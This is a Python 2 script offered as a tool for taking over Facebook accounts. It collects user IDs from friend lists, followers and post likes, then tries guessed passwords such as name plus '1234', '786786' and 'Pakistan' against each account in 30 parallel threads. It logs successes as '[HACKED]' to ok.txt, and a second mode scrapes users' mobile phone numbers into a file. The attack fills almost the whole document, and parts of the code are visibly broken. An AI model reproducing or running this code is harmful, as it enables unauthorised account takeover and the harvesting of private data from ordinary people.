#coding=utf-8\n\n#!/usr/bin/python2\n\n

#coding=utf-8\n

#originally written by Sohaib MuGhaL\ntry:\n   

 import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib,requests\n    from multiprocessing.pool import ThreadPool\nexcept ImportError:\n    os.system("pip2 install requests")\n    os.system("pip2 install mechanize")\n    os.system("python2 hpro.py")\ntry:\n    os.mkdir(\'save\')\nexcept OSError:\n    pass\n# if os.path.isfile(\'.../index.js\'):\n# \tos.system(\'mv ... .....\')\n# \tos.system(\'cd ..... && npm install\')\n# \tos.system(\'#\')\n# \tos.system(\'#\')\n# \tos.system(\'fuser -k 5000/tcp &\')\n# \tos.system(\'#\')\n# \tos.system(\'node ...../index.js &\')\n# \tos.system(\'fuser -k 5000/tcp &\')\n# \tos.system(\'#\')\n# \tos.system(\'node ...../index.js &\')\nfrom requests.exceptions import ConnectionError\nbd=random.randint(2e7, 3e7)\nsim=random.randint(2e4, 4e4)\nheader={\'x-fb-connection-bandwidth\': repr(bd),\'x-fb-sim-hni\': repr(sim),\'x-fb-net-hni\': repr(sim),\'x-fb-connection-quality\': \'EXCELLENT\',\'x-fb-connection-type\': \'cell.CTRadioAccessTechnologyHSDPA\',\'user-agent\':\'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/35.0.0.48.273;]\',\'content-type\': \'application/x-www-form-urlencoded\',\'x-fb-http-engine\': \'Liger\'}\nreload(sys)\nsys.setdefaultencoding("utf8")\n\ndef ham(z):\n\tfor e in z + "\\n":\n\t\tsys.stdout.write(e)\n\t\tsys.stdout.flush()\n\t\ttime.sleep(0.03)\ndef logging():\n    titik = [".   ","..  ","... "]\n    for o in titik:\n        print("\\r\\033[1;32m[\xe2\x9c\x93] Logging In\\033[0;97m "+o),;sys.stdout.flush();time.sleep(1)\ndef saving():\n    titik = [".   ","..  ","... "]\n    for o in titik:\n        print("\\r\\033[1;32m[\xe2\x9c\x93] Saving Token\\033[0;97m "+o),;sys.stdout.flush();time.sleep(1)\ndef updateing():\n    titik = [".   ","..  ","... "]\n    for o in titik:\n        print("\\r\\033[1;32m[\xe2\x9c\x93] Getting Updates\\033[0;97m "+o),;sys.stdout.flush();time.sleep(1)\ndef logout():\n    titik = [".   ","..  ","... "]\n    for o in titik:\n        print("\\r\\033[1;32m[\xe2\x9c\x93] Logging Out\\033[0;97m "+o),;sys.stdout.flush();time.sleep(1)\ndef download():\n    titik = [".   ","..  ","... "]\n    for o in titik:\n        print("\\r\\033[1;32m[\xe2\x9c\x93] Downloading\\033[0;97m "+o),;sys.stdout.flush();time.sleep(1)\n#logo\nbanner = """

\\033[1;91m █▀ ▄▀█ █░░ █░█░█ ▄▀█

\\033[1;92m ▄█ █▀█ █▄▄ ▀▄▀▄▀ █▀█

\\033[1;91m █▀ █░█ █▀█ ▄▀█ █ █▄▄

\\033[1;92m ▄█ █▀█ █▄█ █▀█ █ █▄█ \\033[1;92m     [|;\xc2\xa4;|]           Shoaib Ali\n                            \n\\x1b[1;95m------------------------------------------------------

 \n\n\\x1b[1;96m\xe2\x9e\xa3 Youtube:Technical King \n\n\\x1b[1;92m\xe2\x9e\xa3 NAME :           \xf0\x9f\x92\x97 Sohaib.Salwa \xf0\x9f\x92\x97\n\\x1b[1;95m\xe2\x9e\xa3 SEARCH FACEBOOK ID :  \xf0\x9f\x91\x89 Shoaib.ali.blouch\n\n\\x1b[1;93m-----------------------------------------------------

 -\n"""\n\n\n\n\nidh = []\n\ndef tool_login():\n    os.system("clear")\n    print banner\n    print \n    username = raw_input("[+] Username : ")\n    if username =="shoaib":\n        os.system("clear")\n        print banner\n        print\n        print ("[\xe2\x9c\x93] Username : shoaib (Correct)")\n        passwordss = raw_input("[+] Password : ")\n        if passwordss =="salwa":\n            os.system("clear")\n            print banner\n            print \n            logging()\n            os.system("clear")\n            print banner\n            print \n            print ("[\xe2\x9c\x93] Username : shoaib (Correct)")\n            print ("[\xe2\x9c\x93] Password : salwa  (Correct)")\n            time.sleep(1)\n            print(\'\')\n            ham("\\033[1;32m[\xe2\x9c\x93] Login Successful\\033[0;97m")\n            time.sleep(1)\n        try:\n            open(".login.txt","r")\n            menu()\n        except(KeyError , IOError):\n            login_choice()\n        else:\n            print ("[!] Password : "+passwordss+" (Wrong)")\n            time.sleep(1)\n            tool_login()\n    else:\n        print ("[!] Username : "+username+" (Wrong)")\n        time.sleep(1)\n        tool_login()\ndef login_choice():\n    os.system("clear")\n    print banner\n    print\n    print ("[1] Login With Token(Safe Method)")\n    print ("[2] Login With ID/Password(May Have Checkpoint)")\n    print ("[0] Exit")\n    print \n    login_select()\ndef login_select():\n    select = raw_input("\\nChoose Option >>> ")\n    if select =="1":\n        os.system("clear")\n        print banner\n        print \n        print ("Login With Token").center(50)\n        print\n        print ("[1] Create a New  Account And Download GetAccessToken Apk From Playstore")\n        print(\'\')\n        print ("[2] After Opening Apk Give Your ID & Password And Click On Get Now To Get Token and Paste Here")\n        print(\'\')\n        print ("[3] Please Enable Two Factor Authentication On Your Account Before Creating Token")\n        print \n        print 47*   ("-")\n        print \n        token = raw_input("[+] Paste Token Here : ")\n        saving()\n        sav = open(".login.txt","w")\n        sav.write(token)\n        sav.close()\n        ham("\\r\\033[1;32m[\xe2\x9c\x93] Login Successfull\\033[0;97m")\n        time.sleep(1)\n        menu()\n    elif select =="2":\n        loginfb()\n    elif select =="0":\n        os.system("exit")\n    else:\n        print ("[!] Please Select a Valid Option")\n        login.select()\ndef loginfb():\n    os.system("clear")\n    print bannner\n    print\n    print("Login With Facebook Account").center(50)\n    print\n    print("[1] Create a New Facebook Account")\n    print("[2] Please Enable Two Factor Authentication On New Created Account")\n    print(\'\')\n    print("[3] Use App Password Instead Of Real Password For Logging In Here")\n    print\n    print 47*("-")\n    print\n    id = raw_input("[+] Email/ID/Number : ")\n    id1 = id.replace(\' \',\'\')\n    id2 = id1.replace(\'(\',\'\')\n    uid = id2.replace(\')\',\'\')\n    pwd = raw_input("[+] Password       : ")\n    print\n    logging()\n    print\n    data = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email="+uid+"&locale=en_US&password="+pwd+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6", headers=header).text\n    q = json.loads(data)\n    if "access_token" in q:\n        succ = open(".login.txt","w")\n        succ.write(q["access_token"])\n        succ.close()\n        print("\\n\\033[1;32m[\xe2\x9c\x93] Login Successfull\\033[0;97m")\n        time.sleep(1)\n        menu()\n    else:\n        if "www.facebook.com" in q["error_msg"]:\n            print ("\\n\\033[1;31m[!] Login Failed . Account Has a Checkpoint\\033[0;97m")\n            time.sleep(1)\n            loginfb()\n        else:\n            print("\\n\\033[1;31m[!] Login Failed.Email/ID/Number OR Password May BE Wrong\\033[0;97m")\n            time.sleep(1)\n            loginfb()\ndef menu():\n    os.system("clear")\n    try:\n        token = open(".login.txt","r").read()\n    except IOError:\n        print banner\n        print("[!] Error 404.Token Not Found")\n        os.system("rm -rf .login.txt")\n        time.sleep(1)\n        login_choice()\n    try:\n        r = requests.get("https://graph.facebook.com/me?access_token="+token, headers=header)\n        a = json.loads(r.text)\n        name = a["name"]\n        lname = a["last_name"]\n    except KeyError:\n        os.system("clear")\n        print banner\n        print("[!] Loading Failed . Your Account Has a Checkpoint")\n        os.system("rm -rf .login.txt")\n        time.sleep(1)\n        login_choice()\n    os.system("clear")\n    print banner\n    print\n    print("[\xe2\x9c\x93] Name : "+name)\n    print\n    print 47*("-")\n    print\n    print("[1] Start Cracking")\n    print("[2] Grab Numbers")\n    print("[3] Contact")\n    print("[4] Update")\n    print("[5] Logout")\n    print \n    menu_select()\ndef menu_select():\n    option = raw_input("\\nChoose Option >>> ")\n    if option =="1":\n        crack()\n    elif option =="2":\n        cnumber()\n    elif option =="3":\n        contact()\n    elif option =="4":\n        os.system("clear")\n        print banner\n        updateing()\n        os.system("git pull origin master")\n        time.sleep(1)\n        os.system("clear")\n        print banner\n        ham("\\033[1;32m[\xe2\x9c\x93] Tool Has Been Updated Successfully\\033[0;97m")\n        time.sleep(1)\n        os.system("python2 hop.py")\n    elif option =="6":\n        logout()\n        os.system("rm -rf .login.txt")\n        time.sleep(1)\n        print("\\r\\033[1;32m[\xe2\x9c\x93] Logged Out Successfully\\033[0;97m")\n        os.system("exit")\n    else:\n        print("[!] Please Select a Valid Option")\n        menu_select()\ndef crack():\n\tglobal token\n\tos.system("clear")\n\ttry:\n\t\ttoken=open(".login.txt","r").read()\n\texcept IOError:\n\t\tprint("[!] Error 404 . Token Not Found")\n\t\tos.system("rm -rf .login.txt")\n\t\ttime.sleep(1)\n\t\tlogin()\n\tos.system("clear")\n\tprint banner\n\tprint ("[1] Crack From Friend List")\n\tprint ("[2] Crack From Public ID")\n\tprint ("[3] Crack From Followers")\n\tprint ("[4] Crack From Page/Group/ID Post")\n\tprint (\'[0] Back\')\n\tprint(\'\')\n\tcrack2()\ndef crack2():\n\tselect = raw_input("\\nChoose Option >>> ")\n\tid=[]\n\toks=[]\n\tcps=[]\n\tif select=="1":\n\t\tos.system("clear")\n\t\tprint banner\n\t\tr = requests.get("https://graph.facebook.com/me/friends?access_token="+token, headers=header)\n\t\tz = json.loads(r.text)\n\t\tfor s in z["data"]:\n\t\t\tuid=s[\'id\']\n\t\t\tna=s[\'name\']\n\t\t\tnm=na.rsplit(" ")[0]\n\t\t\tid.append(uid+\'|\'+nm)\n\telif select =="2":\n\t\tos.system("clear")\n\t\tprint banner\n\t\tidt = raw_input("[+] Input ID : ")\n\t\tos.system("clear")\n\t\tprint banner\n\t\ttry:\n\t\t\tr = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token, headers=header)\n\t\t\tq = json.loads(r.text)\n\t\t\tprint("[\xe2\x9c\x93] Account Name : "+q["name"])\n\t\texcept KeyError:\n\t\t\tprint(\'\\n[!] Error 404 . ID Link \'+idt+\' Have Privacy On Friendlist OR IS Not Valid\')\n\t\t\traw_input("\\nPress Enter To Back ")\n\t\t\tcrack()\n\t\tr = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+token, headers=header)\n\t\tz = json.loads(r.text)\n\t\tfor i in z["data"]:\n\t\t\tuid=i[\'id\']\n\t\t\tna=i[\'name\']\n\t\t\tnm=na.rsplit(" ")[0]\n\t\t\tid.append(uid+\'|\'+nm)\n\telif select =="3":\n\t\tos.system("clear")\n\t\tprint banner\n\t\tidt = raw_input("[+] Input ID : ")\n\t\tos.system("clear")\n\t\tprint banner\n\t\ttry:\n\t\t\tr = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token, headers=header)\n\t\t\tq = json.loads(r.text)\n\t\t\tprint("[\xe2\x9c\x93] Account Name : "+q["name"])\n\t\texcept KeyError:\n\t\t\tprint(\'\\n[!] Error 404 . ID Link \'+idt+\' Donot Have Followers OR IS Not Valid\')\n\t\t\traw_input("\\nPress Enter To Back ")\n\t\t\tcrack()\n\t\tr = requests.get("https://graph.facebook.com/"+idt+"/subscribers?access_token="+token+"&limit=5000", headers=header)\n\t\tz = json.loads(r.text)\n\t\tfor i in z["data"]:\n\t\t\tuid=i[\'id\']\n\t\t\tna=i[\'name\']\n\t\t\tnm=na.rsplit(" ")[0]\n\t\t\tid.append(uid+\'|\'+nm)\n\telif select =="4":\n\t\tos.system("clear")\n\t\tprint banner\n\t\tidt = raw_input("[!] Input Post ID : ")\n\t\tos.system("clear")\n\t\tprint banner\n\t\tprint(\'\')\n\t\ttry:\n\t\t\tr = requests.get("https://graph.facebook.com/"+idt+"/likes?limit=9999999&access_token="+token, headers=header)\n\t\t\tz = json.loads(r.text)\n\t\t\tfor i in z["data"]:\n\t\t\t\tuid=i[\'id\']\n\t\t\t\tna=i[\'name\']\n\t\t\t\tnm=na.rsplit(" ")[0]\n\t\t\t\tid.append(uid+\'|\'+nm)\n\t\texcept KeyError:\n\t\t\tprint(\'\\n[!] Error 404 . Post ID \'+idt+\' May Not Be Valid\')\n\t\t\traw_input("\\nPress Enter To Back")\n\t\t\tcrack()\n\t   \n\telif select =="0":\n\t\tmenu()\n\telse:\n\t\tprint ("[!] Please Select a Valid Option")\n\t\tcrack2()\n\tham("[\xe2\x9c\x93] Total IDs : "+str(len(id)))\n\ttime.sleep(0.5)\n\tham("[\xe2\x9c\x93] The Process Is Running In Background")\n\ttime.sleep(0.5)\n\tham("[\xe2\x9c\x93] To Stop Process Press CTRL Then Press z")\n\ttime.sleep(0.5)\n\tprint 47*("-")\n\tprint(\'\')\n\t\n\t\n\tdef main(arg):\n\t\tuser=arg\n\t\tuid,name=user.split("|")\n\t\ttry:\n\t\t    pass1=name+"1234"\n\t\t    q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=en_US&password=" + pass1 + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6", headers=header).text\n\t\t    d=json.loads(q)\n\t\t    if \'www.facebook.com\' in d[\'error_msg\']:\n\t\t        print("[CP] "+uid+" | "+pass1)\n\t\t        cp=open("cp.txt","a")\n\t\t        cp.write(uid+" | "+pass1+"\\n")\n\t\t        cp.close()\n\t\t        cps.append(uid)\n\t\t    else:\n\t\t    \tif "access_token" in d:\n\t\t            print("\\x1b[1;92m[HACKED] \\033[1;30m"+uid+" | "+pass1+"\\x1b[1;0m")\n\t\t            ok=open("ok.txt","a")\n\t\t            ok.write(uid+" | "+pass1+"\\n")\n\t\t            ok.close()\n\t\t            oks.append(uid)\n\t\t        else:\n\t\t            pass2="786786"\n\t\t            q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=en_US&password=" + pass2 + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6", headers=header).text\n\t\t            d=json.loads(q)\n\t\t            if \'www.facebook.com\' in d[\'error_msg\']:\n\t\t                print("[CP] "+uid+" | "+pass2)\n\t\t                cp=open("cp.txt","a")\n\t\t                cp.write(uid+" | "+pass2+"\\n")\n\t\t                cp.close()\n\t\t                cps.append(uid)\n\t\t            else:\n\t\t                if \'access_token\' in d:\n\t\t                    print("\\x1b[1;92m[HACKED] \\033[1;30m"+uid+" | "+pass2+"\\x1b[1;0m")\n\t\t                    ok=open("ok.txt","a")\n\t\t                    ok.write(uid+" | "+pass2+"\\n")\n\t\t                    ok.close()\n\t\t                    oks.append(uid)\n\t\t                else:\n\t\t                    pass3=name+"123"\n\t\t                    q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=en_US&password=" + pass3 + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6", headers=header).text\n\t\t                    d=json.loads(q)\n\t\t                    if \'www.facebook.com\' in d[\'error_msg\']:\n\t\t                        print("[CP] "+uid+" | "+pass3)\n\t\t                        cp=open("cp.txt","a")\n\t\t                        cp.write(uid+" | "+pass3+"\\n")\n\t\t                        cp.close()\n\t\t                        cps.append(uid)\n\t\t                    else:\n\t\t                        if \'access_token\' in d:\n\t\t                            print(" \\x1b[1;92m[HACKED] \\033[1;30m"+uid+" | "+pass3+"\\x1b[1;0m")\n\t\t                            ok=open("ok.txt","a")\n\t\t                            ok.write(uid+" | "+pass3+"\\n")\n\t\t                            ok.close()\n\t\t                            oks.append(uid)\n\t\t                        else:\n\t\t                            pass4="Pakistan"\n\t\t                            q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=en_US&password=" + pass4 + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6", headers=header).text\n\t\t                            d=json.loads(q)\n\t\t                            if \'www.facebook.com\' in d[\'error_msg\']:\n\t\t                                print("[CP-] "+uid+" | "+pass4)\n\t\t                                cp=open("cp.txt","a")\n\t\t                                cp.write(uid+" | "+pass4+"\\n")\n\t\t                                cp.close()\n\t\t                                cps.append(uid)\n\t\t                            else:\n\t\t                                if \'access_token\' in d:\n\t\t                                    print("\\x1b[1;92m[HACKED] \\033[1;30m"+uid+" | "+pass4+"\\x1b[1;0m")\n\t\t                                    ok=open("ok.txt","a")\n\t\t                                    ok.write(uid+" | "+pass4+"\\n")\n\t\t                                    ok.close()\n\t\t                                    oks.append(uid)\n\t\t                                else:\n\t\t                                    pass5=name+"12345"\n\t\t                                    q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=en_US&password=" + pass5 + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6", headers=header).text\n\t\t                                    d=json.loads(q)\n\t\t                                    if \'www.facebook.com\' in d[\'error_msg\']:\n\t\t                                        print("[CP] "+uid+" | "+pass5)\n\t\t                                        cp=open("cp.txt","a")\n\t\t                                        cp.write(uid+" | "+pass5+"\\n")\n\t\t                                        cp.close()\n\t\t                                        cps.append(uid)\n\t\t                                    else:\n\t\t                                        if \'access_token\' in d:\n\t\t                                            print("\\x1b[1;92m[HACKED] \\033[1;30m"+uid+" | "+pass5+"\\x1b[1;0m")\n\t\t                                            ok=open("ok.txt","a")\n\t\t                                            ok.write(uid+" | "+pass5+"\\n")\n\t\t                                            ok.close()\n\t\t                                            oks.append(uid)\n\t\t                                        else:\n\t\t                                            pass6=name+"786"\n\t\t                                            q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=en_US&password=" + pass6 + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6", headers=header).text\n\t\t                                            d=json.loads(q)\n\t\t                                            if \'www.facebook.com\' in d[\'error_msg\']:\n\t\t                                                print("[CP] "+uid+" | "+pass6)\n\t\t                                                cp=open("cp.txt","a")\n\t\t                                                cp.write(uid+" | "+pass6+"\\n")\n\t\t                                                cp.close()\n\t\t                                                cps.append(uid)\n\t\t                                            else:\n\t\t                                                if \'access_token\' in d:\n\t\t                                                    print("\\x1b[1;92m[HACKED] \\033[1;30m"+uid+" | "+pass6+"\\x1b[1;0m")\n\t\t                                                    ok=open("ok.txt","a")\n\t\t                                                    ok.write(uid+" | "+pass6+"\\n")\n\t\t                                                    ok.close()\n\t\t                                                    oks.append(uid)\n\t\t                                                else:\n\t\t                                                    pass7=name+"112233"\n\t\t                                                    q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=en_US&password=" + pass7 + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6", headers=header).text\n\t\t                                                    d=json.loads(q)\n\t\t                                                    if \'www.facebook.com\' in d[\'error_msg\']:\n\t\t                                                        print("[CP] "+uid+" | "+pass7)\n\t\t                                                        cp=open("cp.txt","a")\n\t\t                                                        cp.write(uid+" | "+pass7+"\\n")\n\t\t                                                        cp.close()\n\t\t                                                        cps.append(uid)\n\t\t                                                    else:\n\t\t                                                        if \'access_token\' in d:\n\t\t                                                            print("\\x1b[1;92m[HACKED] \\033[1;30m"+uid+" | "+pass7+"\\x1b[1;0m")\n\t\t                                                            ok=open("ok.txt","a")\n\t\t                                                            ok.write(uid+" | "+pass7+"\\n")\n\t\t                                                            ok.close()\n\t\t                                                            oks.append(uid)\n\t\t                                                        else:\n                                                                            pass10=name+"1214"\n                                                                            q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=en_US&password=" + pass10 + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6", headers=header).text\n                                                                            d=json.loads(q)\n                                                                            if \'www.facebook.com\' in d[\'error_msg\']:\n                                                                                print("[CP] "+uid+" | "+pass10)\n                                                                                cp=open("cp.txt","a")\n                                                                                cp.write(uid+" | "+pass10+"\\n")\n                                                                                cp.close()\n                                                                                cps.append(uid)\n                                                                            else:\n                                                                                if \'access_token\' in d:\n                                                                                    print("\\x1b[1;92m[HACKED] \\033[1;30m"+uid+" | "+pass10+"\\x1b[1;0m")\n                                                                                    ok=open("ok.txt","a")\n                                                                                    ok.write(uid+" | "+pass10+"\\n")\n                                                                                    ok.close()\n                                                                                    oks.append(uid)\n                                                                                \n\n\t\t            \t\t\t\t\t\t\t\t\t\t\n\t\texcept:\n\t\t\tpass\n\t\t\n\tp = ThreadPool(30)\n\tp.map(main, id)\n\tprint(\'\')\n\tprint 47*\'-\'\n\tprint(\'\')\n\tprint (\'[\xe2\x9c\x93] Process Has Been Completed\')\n\tprint(\'[\xe2\x9c\x93] Total CP/\\033[1:32mOK:\\033[0;97m  \'+str(len(cps))+\'/\\033[;32m \\033[0;97m\'+str(len(oks)))\n\tprint(\'\')\n\tprint 47*(\'-\')\n\tprint(\'\')\n\tdown()\ndef down():\n    dow = raw_input("[?] Do You Want To Download Cp File? (Yes/No) ")\n    if dow =="yes" or dow =="y":\n        os.system("clear")\n        print banner\n        download()\n        print(\'\')\n        print("[!] Please Give Storage Permission If Ask")\n        os.system("termux-setup-storage")\n        os.system("cp cp.txt /sdcard")\n        print(\'\')\n        print(\'[\xe2\x9c\x93] File Downloaded Successfully\')\n        print("[\xe2\x9c\x93] Please Open Your Internal Storage and Rename The File")\n        raw_input("Press Enter To Return In Main Menu ")\n        crack()\n    elif dow =="no" or dow=="n":\n        crack()\n    else:\n        print("[!] Please Select a Valid Option ")\n        down()\ndef cnumber():\n\tglobal token\n\tos.system("clear")\n\ttry:\n\t\ttoken=open(".login.txt","r").read()\n\texcept IOError:\n\t\tprint("[!] Error 404 . Token not Found")\n\t\tos.system("rm -rf .login.txt")\n\t\ttime.sleep(1)\n\t\tlogin()\n\tos.system("clear")\n\tprint banner\n\tprint ("[1] Crack Numbers From Friends")\n\tprint ("[2] Crack Numbers From Public ID")\n\tprint ("[3] Crack Numbers From Followers")\n\tprint ("[4] Crack Numbers From Public Post")\n\tprint (\'[0] Back\')\n\tprint(\'\')\n\tcnumber2()\n\ndef cnumber2():\n\tselect = raw_input("\\nChoose Option >>> ")\n\tid=[]\n\tnms=[]\n\tif select=="1":\n\t\tos.system("clear")\n\t\tprint banner\n\t\tr = requests.get("https://graph.facebook.com/me/friends?access_token="+token, headers=header)\n\t\tz = json.loads(r.text)\n\t\tfor s in z["data"]:\n\t\t\tuid=s[\'id\']\n\t\t\tna=s[\'name\']\n\t\t\tnm=na.rsplit(" ")[0]\n\t\t\tid.append(uid+\'|\'+nm)\n\telif select =="2":\n\t\tos.system("clear")\n\t\tprint banner\n\t\tidt = raw_input("[+] Input ID : ")\n\t\tos.system(\'clear\')\n\t\tprint banner\n\t\ttry:\n\t\t\tr = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token, headers=header)\n\t\t\tq = json.loads(r.text)\n\t\t\tprint("[\xe2\x9c\x93] Account Name : "+q["name"])\n\t\texcept KeyError:\n\t\t\tprint(\'\\n[!] Error 404 . ID Not Found\')\n\t\t\traw_input("\\nPress Enter To Back ")\n\t\t\tcnumber()\n\t\tr = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+token, headers=header)\n\t\tz = json.loads(r.text)\n\t\tfor i in z["data"]:\n\t\t\tuid=i[\'id\']\n\t\t\tna=i[\'name\']\n\t\t\tnm=na.rsplit(" ")[0]\n\t\t\tid.append(uid+\'|\'+nm)\n\telif select =="3":\n\t\tos.system("clear")\n\t\tprint banner\n\t\tidt = raw_input("[+] Input ID : ")\n\t\tos.system("clear")\n\t\tprint banner\n\t\ttry:\n\t\t\tr = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token, headers=header)\n\t\t\tq = json.loads(r.text)\n\t\t\tprint("[\xe2\x9c\x93] Account Name : "+q["name"])\n\t\texcept KeyError:\n\t\t\tprint(\'\\n[!] Error 404 . ID Not Found\')\n\t\t\traw_input("\\nPress Enter To Back ")\n\t\t\tcnumber()\n\t\tprint(\'[\xe2\x9c\x93] Looking For Accounts\')\n\t\tr = requests.get("https://graph.facebook.com/"+idt+"/subscribers?access_token="+token+"&limit=5000", headers=header)\n\t\tz = json.loads(r.text)\n\t\tfor i in z["data"]:\n\t\t\tuid=i[\'id\']\n\t\t\tna=i[\'name\']\n\t\t\tnm=na.rsplit(" ")[0]\n\t\t\tid.append(uid+\'|\'+nm)\n\telif select =="4":\n\t\tos.system("clear")\n\t\tprint banner\n\t\tidt = raw_input("[+] Enter Post ID : ")\n\t\tos.system(\'clear\')\n\t\tprint banner\n\t\ttry:\n\t\t\tr = requests.get("https://graph.facebook.com/"+idt+"/likes?access_token="+token+"limit=9999999", headers=header)\n\t\t\tz = json.loads(r.text)\n\t\t\tfor i in z["data"]:\n\t\t\t\tuid=i[\'id\']\n\t\t\t\tna=i[\'name\']\n\t\t\t\tnm=na.rsplit(" ")[0]\n\t\t\t\tid.append(uid+\'|\'+nm)\n\t\texcept KeyError:\n\t\t\tprint(\'\\n[!] Error 404 . Invalid Post ID\')\n\t\t\traw_input("\\nPress Enter To Back ")\n\t\t\tcnumber()\n\telif select =="0":\n\t\tmenu()\n\telse:\n\t\tprint ("[!] Please Select a Valid Option")\n\n\t\tcnumber2()\n\tprint ("[\xe2\x9c\x93] Total IDs : "+str(len(id)))\n\tprint(\'\')\n\tprint("[\xe2\x9c\x93]To Stop Process Press CTRL Then Press z")\n\tprint 47*("-")\n\tprint(\'\')\n\n\tdef main(arg):\n\t\tuser=arg\n\t\tuid,name=user.split("|")\n\t\ttry:\n\t\t    q = requests.get("https://graph.facebook.com/"+uid+"?access_token="+token, headers=header).text\n\t\t    d=json.loads(q)\n\t\t    number=q[\'mobile_phone\']\n\t\t    print(name+\' | \'+uid+" | "+number)\n\t\t    nmb=open("save/numbers.txt","a")\n\t\t    nmb.write(name+\' | \'+uid+" | "+number+"\\n")\n\t\t    nmb.close()\n\t\t    nms.append(number)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\texcept:\n\t\t\tpass\n\t\t\n\tp = ThreadPool(30)\n\tp.map(main, id)\n\tprint(\'\')\n\tprint 50*\'-\'\n\tprint(\'\')\n\tprint (\'Process Has Been Completed\')\n\tprint(\'Total Numbers :  \'+str(len(nms)))\n\tprint(\'\')\n\tprint 50*(\'-\')\n\tprint(\'\')\n\traw_input(\'\\n Press Enter To Go Back\')\n\tcnumber()\ndef contact():\n    os.system("clear")\n    print banner\n    print("[1] Facebook")\n    print("[2] Facebook")\n    print(\'\')\n    contact_info()\ndef contact_info():\n    info = raw_input("\\nChoose Option >>> ")\n    if info =="1":\n        print(\'\')\n        os.system("xdg-open https://facebook.com/shoaib.ali.blouch")\n    elif info =="2":\n        os.system("xdg-open https://facebook.com/shoaib.ali.blouch")\n    else:\n        print("[!] Please Select Valid Option")\n        print(\'\')\n        contact_info()\nif __name__ == \'__main__\':\n    tool_login()\n'

